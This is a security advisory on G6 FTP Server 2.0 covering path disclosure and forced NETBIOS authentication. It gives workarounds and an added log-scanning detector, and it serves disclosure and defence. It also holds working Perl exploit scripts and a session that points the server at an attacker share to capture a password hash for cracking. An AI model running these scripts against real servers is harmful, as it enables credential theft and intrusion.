G6 FTP file disclosure and NETBIOS hash retrieval vulnerability

Published: 2001-04-05
Updated: 2001-04-05
Severity: high
Threat type: password recovery
Error type: design error
Exploitation mode: server mode

Affected systems
G6 FTP Server version 2.0

Detailed description
Gene6's G6 FTP Server (http://www.gene6.com/) does not properly restrict access to files outside the FTP root directory; with the 'SIZE' and 'MDTM' commands the system's directory structure can be enumerated. Many products enable networking and resource sharing and use universal naming convention (UNC) paths to reach resources and files on other machines, without careful security review. The G6 FTP server also accepts UNC paths: by requesting the size or modification-time attribute of an external share, an FTP client can force the service to open an outbound NETBIOS connection. When the service connects to the remote host to collect the file information, the credentials of the account running the server are passed to that host for authentication. At that moment a sniffer can capture the NETBIOS hash, which can then be cracked with a tool such as 'L0phtcrack'.

As shown below:

Ftp server = 10.1.1.13
Attacker = 10.1.1.11

<----------begin screen dump---------->
rob@testbox:~$ telnet 10.1.1.13 21
Trying 10.1.1.13...
Connected to 10.1.1.13.
Escape character is '^]'.
220 Test server by G6 FTP Server ready ...
USER G6
331 Password required for whitey.
PASS test
230 User G6 logged in.
SIZE \\10.1.1.11\share\evil.txt
213 0
<----------end screen dump---------->

Below is the captured packet:

<----------begin packet dump---------->
00000030 FF 53 4D 42 73 00 .SMBs.
00000040 00 00 00 18 07 C8 00 00 00 00 00 00 00 00 00 00 ................
00000050 00 00 00 00 FF FE 00 00 80 00 0D 75 00 E8 00 04 ...........u....
00000060 11 32 00 01 00 00 00 00 00 18 00 18 00 00 00 00 .2..............
00000070 00 D4 00 00 00 AB 00 19 ED E4 2F 4D 1A 46 D2 BB ........../M.F..
00000080 00 BF 62 1F 93 71 E7 17 4E D0 63 81 88 B2 17 77 ..b..q..N.c....w
00000090 9C 73 4D 74 88 67 63 80 50 30 26 63 1F 6B A8 D3 .sMt.gc.P0&c.k..
000000A0 3D 70 36 20 00 C4 B0 00 41 00 64 00 6D 00 69 00 =p6.....A.d.m.i.
000000B0 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 n.i.s.t.r.a.t.o.
000000C0 72 00 00 00 56 00 49 00 43 00 54 00 49 00 4D 00 r...V.I.C.T.I.M.
000000D0 48 00 4F 00 53 00 54 00 00 00 57 00 69 00 6E 00 H.O.S.T...W.i.n.
000000E0 64 00 6F 00 77 00 73 00 20 00 32 00 30 00 30 00 d.o.w.s...2.0.0.
000000F0 30 00 20 00 32 00 31 00 39 00 35 00 00 00 57 00 0...2.1.9.5...W.
00000100 69 00 6E 00 64 00 6F 00 77 00 73 00 20 00 32 00 i.n.d.o.w.s...2.
00000110 30 00 30 00 30 00 20 00 35 00 2E 00 30 00 00 00 0.0.0...5...0...
00000120 00 00 04 FF 00 1E 01 08 00 01 00 2B 00 00 5C 00 ...........+..\.
00000130 5C 00 31 00 30 00 2E 00 31 00 2E 00 31 00 2E 00 \.1.0...1...1...
00000140 31 00 31 00 5C 00 53 00 48 00 41 00 52 00 45 00 1.1.\.S.H.A.R.E.
00000150 00 00 3F 3F 3F 3F 3F 00 ..?????.
<----------end packet dump---------->

Test code

Temporary workarounds:
1) Enable the 'show relative paths' option in the server configuration (Setup->Main->Options menu).
2) Disable the NETBIOS protocol on the host's external network interface.
3) If a remote share is required, change the configuration from item 1 and map the remote resource as a local virtual drive.

Solution
The following script probes the common drive letters and directories for the registry editor (regedit.exe) and for IIS files:

<----------begin example script g6-find.pl---------->
#!/usr/bin/perl
# g6-find.pl
# example G6 Ftp Server file disclosure vulnerability script
use Getopt::Std;
use IO::Socket;

getopts('h:l:p:',\%args);
my ($CRLF,$port,$login,$pass,$sock_res,$win_base,$iis_base,@drives);
$CRLF = "\015\012";
@drives = ("c","d","e","f");
$port = 21;
$login = 'anonymous';
$pass = 'user@myhost.com';

if (defined $args{h}) { $host = $args{h}; } else { print "No host specified.\n"; exit; }
if (defined $args{l}) { $login = $args{l}; }
if (defined $args{p}) { $pass = $args{p}; }

$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host,PeerPort=>$port) || die("Socket errors: $!");
$sock_res = <$sock>;                       # 220 banner
print $sock "USER $login" . $CRLF;
$sock_res = <$sock>;                       # 331 password required
print $sock "PASS $pass" . $CRLF;
$sock_res = <$sock>;                       # 230 logged in
if ($sock_res !~ /230\s/) { print "Login/password not accepted...exiting.\n"; close($sock); exit; }

# With 'show relative paths' off, PWD returns a drive-absolute path such as /c:/ftp/
print $sock "PWD" . $CRLF;
$sock_res = <$sock>;
if (lc($sock_res) !~ /\/[a-z][:]\//) { print "Looks like 'show relative path' is enabled...exiting.\n"; close($sock); exit; }

print "Attempting to locate system files...";
$win_base = &FindWindows;
$iis_base = &FindIIS;
print "done.\n\n";
close($sock);
print "Windows directory: $win_base\n";
print "Hints to IIS path: $iis_base\n";
exit;

# A 213 reply to SIZE means the file exists outside the FTP root.
sub FindWindows {
  my @win_dirs = ("win","windows","winnt","winme");
  foreach $drive (@drives) {
    foreach $dir (@win_dirs) {
      print ".";
      print $sock "SIZE /$drive:/$dir/regedit.exe" . $CRLF;
      $sock_res = <$sock>;
      if ($sock_res =~ /213\s/) { return("$drive:\\$dir"); }
    }
  }
  return("not found");
}

sub FindIIS {
  my @iis_files = ("Inetpub/wwwroot/_vti_inf.html","Inetpub/Adminscripts/adsutil.vbs","Inetpub/wwwroot/default.asp");
  foreach $drive (@drives) {
    foreach $file (@iis_files) {
      print ".";
      print $sock "SIZE /$drive:/$file" . $CRLF;
      $sock_res = <$sock>;
      if ($sock_res =~ /213\s/) { $file =~ s/\//\\/g; return("$drive:\\$file"); }
    }
  }
  return("not found");
}
<----------end example script g6-find.pl---------->

This script demonstrates how to make the G6 ftp server attempt to authenticate against a given host with its current credential set.
<----------begin example script g6-2nbt.pl---------->
#!/usr/bin/perl
# G6-2nbt.pl - example G6 ftp server netbios connection script
#
# Tested on win32 and Linux, Linux requires share name to be in
# the format: \\\\host\\share\\path or //host/share/path
use Getopt::Std;
use IO::Socket;

my($host,$login,$pass,$share,$CRLF,$result);
$CRLF = "\015\012";
getopts('h:l:p:s:',\%args);
if (!defined $args{h}){ print "No host specified.\n";exit;}else{$host = $args{h};}
if (!defined $args{s}){ print "No share specified.\n";exit;}else{$share = $args{s};}
if (!defined $args{l} || !defined $args{p}){($login,$pass) = ('anonymous','user@myhost.com');}
else { ($login,$pass) = ($args{l},$args{p});}

$our_sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host,PeerPort=>21)|| die("Socket problems.");
print "Connected!\n";
$result = <$our_sock>;                     # consume the 220 banner before sending USER
print "Login...";
print $our_sock "USER $login" . $CRLF;
$result = <$our_sock>;
if ($result !~ /331\s/) { print "User name not accepted or an error occurred...exiting.\n";close($our_sock);exit; }
print "good.\nPass....";
print $our_sock "PASS $pass" . $CRLF;
$result = <$our_sock>;
if ($result !~ /230\s/) {
  if ($result =~ /530\s/) { print "Login/password incorrect exiting.\n";close($our_sock);exit; }
  else { print "Login failure..exiting.\n";close($our_sock);exit; }
}

# PWD sends a single 257 reply; reading it twice (as the original did) blocks forever.
print "good.\nTesting path type...";
print $our_sock "PWD" . $CRLF;
$result = <$our_sock>;
if (lc($result) !~ /\/[a-z][:]\//) { print "Looks like 'show relative path' is enabled...exiting.\n";close($our_sock);exit;}

# The SIZE request on a UNC path is what makes the server connect out over NETBIOS.
print "not relative path.\nSending UNC to connect to...";
print $our_sock "SIZE $share" . $CRLF;
print "completed.\nCheck your logs.\n";
close($our_sock);
exit;
<----------end example script g6-2nbt.pl---------->

Related information
This information was published by @stake advisories (advisories at ATSTAKE.COM).
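A defender-side check for the two abuse patterns described in the advisory (SIZE/MDTM probes with drive-absolute paths outside the FTP root, and UNC arguments that provoke an outbound NETBIOS authentication), written as an added example that is not part of the original advisory; the FTP command-log format and the sample lines are constructed assumptions, not G6's real log format.

```python
import re
from typing import List, Tuple

# Commands the advisory shows being abused: SIZE/MDTM resolve a path without
# transferring it, so they double as probes for files outside the FTP root.
PROBE_COMMANDS = {"SIZE", "MDTM"}
# UNC path in either form the server accepts: \\host\share\... or //host/share/...
UNC_RE = re.compile(r"^(\\\\|//)[^\\/]+[\\/]")
# Drive-absolute path such as /c:/winnt/regedit.exe (the form g6-find.pl sends).
DRIVE_RE = re.compile(r"^/?[a-zA-Z]:[\\/]")
# Hypothetical log format: "<date> <time> <client-ip> <user> <COMMAND> <argument>".
LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) ([A-Z]{3,4}) (.*)$")


def classify_path(arg: str) -> str:
    """Classify an FTP path argument as 'unc', 'drive' or 'relative'."""
    if UNC_RE.match(arg):
        return "unc"      # would trigger an outbound NETBIOS/SMB authentication
    if DRIVE_RE.match(arg):
        return "drive"    # directory enumeration outside the FTP root
    return "relative"


def scan_log(text: str) -> List[Tuple[str, str, str, str]]:
    """Return (client, command, kind, argument) for every SIZE/MDTM request
    whose argument points outside the FTP root."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        _ts, client, _user, cmd, arg = m.groups()
        if cmd in PROBE_COMMANDS:
            kind = classify_path(arg)
            if kind != "relative":
                findings.append((client, cmd, kind, arg))
    return findings


# Constructed sample log (not a real G6 log); addresses mirror the advisory's lab setup.
SAMPLE_LOG = r"""2001-04-05 10:01:02 10.1.1.11 G6 SIZE docs/readme.txt
2001-04-05 10:01:05 10.1.1.11 G6 MDTM /c:/winnt/regedit.exe
2001-04-05 10:01:07 10.1.1.11 G6 SIZE \\10.1.1.11\share\evil.txt
2001-04-05 10:01:09 10.1.1.11 G6 SIZE //10.1.1.11/share/evil.txt
2001-04-05 10:01:12 10.1.1.11 G6 RETR docs/readme.txt"""

if __name__ == "__main__":
    for client, cmd, kind, arg in scan_log(SAMPLE_LOG):
        print(f"{client}: {cmd} {arg!r} -> {kind}")
```

A hit of kind 'unc' is the higher-priority alert, since it means the server account's credentials were offered to the named host; 'drive' hits indicate enumeration outside the root, which the 'show relative paths' workaround above is meant to stop.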